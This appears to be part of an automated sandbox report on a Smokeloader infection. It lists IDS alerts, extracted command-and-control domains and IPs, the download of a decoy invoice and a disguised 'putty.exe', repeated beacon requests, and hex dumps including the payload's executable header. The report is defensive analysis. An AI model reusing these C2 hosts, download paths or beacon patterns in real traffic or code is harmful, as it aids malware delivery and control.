                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49938 -> 109.70.26.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49944 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49944 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49949 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49955 -> 109.70.26.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49961 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49963 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49968 -> 109.70.26.37:80
                  Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                  Source: Malware configuration extractorURLs: http://constractionscity1991.lat/
                  Source: Malware configuration extractorURLs: http://restructurisationservice.ru/
                  Source: Malware configuration extractorURLs: http://connecticutproperty.ru/
                  Source: httpBad PDF prefix: HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 08:23:20 GMT Content-Type: application/pdf Content-Length: 502098 Connection: keep-alive Last-Modified: Mon, 30 Oct 2017 13:39:36 GMT ETag: "7a952-55cc3c4f01600" Accept-Ranges: bytes Data Raw: 30 83 07 a9 4d 06 09 2a 86 48 86 f7 0d 01 07 02 a0 83 07 a9 3d 30 83 07 a9 38 02 01 01 31 0e 30 0c 06 0a 2a 86 24 02 01 01 01 01 02 01 30 83 07 9a 42 06 09 2a 86 48 86 f7 0d 01 07 01 a0 83 07 9a 32 04 83 07 9a 2d 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 52 47 42 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 38 34 30 2f 46 69 6c 74 65 72 2f 44 43 54 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 37 35 30 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 2f 4c 65 6e 67 74 68 20 31 36 34 34 39 31 3e 3e 73 74 72 65 61 6d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 48 00 48 00 00 ff ed 00 38 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 d4 1d 8c d9 8f 00 b2 04 e9 80 09 98 ec f8 42 7e ff c0 00 11 08 03 48 02 ee 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff db 00 43 00 02 02 02 02 02 02 03 02 02 03 05 03 03 03 05 06 05 05 05 05 06 08 06 06 06 06 06 08 0a 08 08 08 08 08 08 0a 0a 0a 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0e 0e 0e 0e 0e 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f ff db 00 43 01 02 02 02 04 04 04 07 04 04 07 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff dd 00 04 00 2f ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fd 64 0e 5d 88 3c 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Dec 2024 08:23:21 GMTContent-Type: application/x-msdos-programContent-Length: 331264Connection: keep-aliveLast-Modified: Wed, 18 Dec 2024 06:47:16 GMTETag: "50e00-62985c8c4e500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 22 d9 df c2 66 b8 b1 91 66 b8 b1 91 66 b8 b1 91 78 ea 24 91 7c b8 b1 91 78 ea 35 91 54 b8 b1 91 78 ea 32 91 e1 b8 b1 91 41 7e ca 91 65 b8 b1 91 66 b8 b0 91 e6 b8 b1 91 78 ea 3b 91 67 b8 b1 91 78 ea 25 91 67 b8 b1 91 78 ea 20 91 67 b8 b1 91 52 69 63 68 66 b8 b1 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 5c e9 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 04 00 00 0e 01 00 00 00 00 00 e7 88 00 00 00 10 00 00 00 80 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 23 c5 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 70 04 00 28 00 00 00 00 40 05 00 d8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 38 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 6a 04 00 00 10 00 00 00 6c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e8 b1 00 00 00 80 04 00 00 64 00 00 00 70 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 39 00 00 00 40 05 00 00 3a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/invoce2.pdf HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/putty.exe HTTP/1.1Host: spotcarservice.ru
                  Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
                  Source: Joe Sandbox ViewASN Name: RU-CENTERRU RU-CENTERRU
                  Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 94.156.177.51:80
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://waaliasqugu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: constractionscity1991.lat
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrjxfdbwvthlvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: restructurisationservice.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrmdrefrhxsklmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: connecticutproperty.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldsjjyyryte.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: constractionscity1991.lat
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmgidbasrntuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: restructurisationservice.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxfqkjutumbric.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: connecticutproperty.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttviunnjnhq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: constractionscity1991.lat
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oswckeqrobwxxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: restructurisationservice.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhwsrcytivmhoptq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: connecticutproperty.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fouawsejyefgcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: constractionscity1991.lat
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyqxqlsrlwqxtdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: restructurisationservice.ru
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifwdryoytskvgy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: connecticutproperty.ru
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/invoce2.pdf HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/putty.exe HTTP/1.1Host: spotcarservice.ru
                  Source: global trafficDNS traffic detected: DNS query: spotcarservice.ru
                  Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                  Source: global trafficDNS traffic detected: DNS query: constractionscity1991.lat
                  Source: global trafficDNS traffic detected: DNS query: restructurisationservice.ru
                  Source: global trafficDNS traffic detected: DNS query: connecticutproperty.ru
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://waaliasqugu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: constractionscity1991.lat
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:23:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
